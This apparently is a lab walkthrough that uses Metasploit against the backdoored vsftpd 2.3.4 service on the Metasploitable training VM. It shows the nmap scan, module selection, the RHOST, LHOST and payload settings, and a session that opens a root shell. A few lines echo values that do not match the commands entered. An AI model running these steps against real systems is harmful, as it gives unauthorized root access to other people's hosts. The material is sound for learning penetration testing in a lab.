Metaploitable Port 21/tcp - vsftpd

Metaploitable Port 21/tcp - vsftpd

Start with a more complete scan:


msf > nmap -sV  10.13.37.136 -p 21
[*] exec: nmap -sV  10.13.37.136 -p 21


Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-12 10:34 EST
Nmap scan report for 10.13.37.136
Host is up (0.0018s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix

Next, try and search for a relevant exploit:

msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

Oh good! It found something so lets configure it to use exploit/unix/ftp/vsftpd_234_backdoor

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) >

Set the remote (target) port and address and the local receiver host ip:

msf exploit(vsftpd_234_backdoor) > set RHOST = 10.13.37.136
RHOST => = 10.13.37.136
msf exploit(vsftpd_234_backdoor) > set RPORT = 21
RPORT => = 21
msf exploit(vsftpd_234_backdoor) > set LHOST 10.13.37.116
LHOST => 10.13.37.116

Search for aan appropriate payload. _Note: this is done from bash, not from inside msfconsole.

$ msfpayload -l | grep unix
    ...
    ...
    cmd/unix/interact
    ...
    ...

Set the payload as well.

msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/interact

Review settings ...

msf exploit(vsftpd_234_backdoor) > set

Module: unix/ftp/vsftpd_234_backdoor
====================================

  Name                   Value
  ----                   -----
  ...
  LHOST                  10.13.37.116
  PAYLOAD                cmd/unix/interact
  RHOST                  10.13.37.136
  RPORT                  21
  ...

... And exploit!

msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (10.13.37.116:54285 -> 10.13.37.136:6200) at 2013-11-12 11:04:25 -0500

whoami
root
ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0c:29:e0:62:7f
          inet addr:10.13.37.136  Bcast:10.13.37.255  Mask:255.255.255.0
          ...

exit

[*] 10.13.37.136 - Command shell session 2 closed.  Reason: Died from EOFError

Hurray!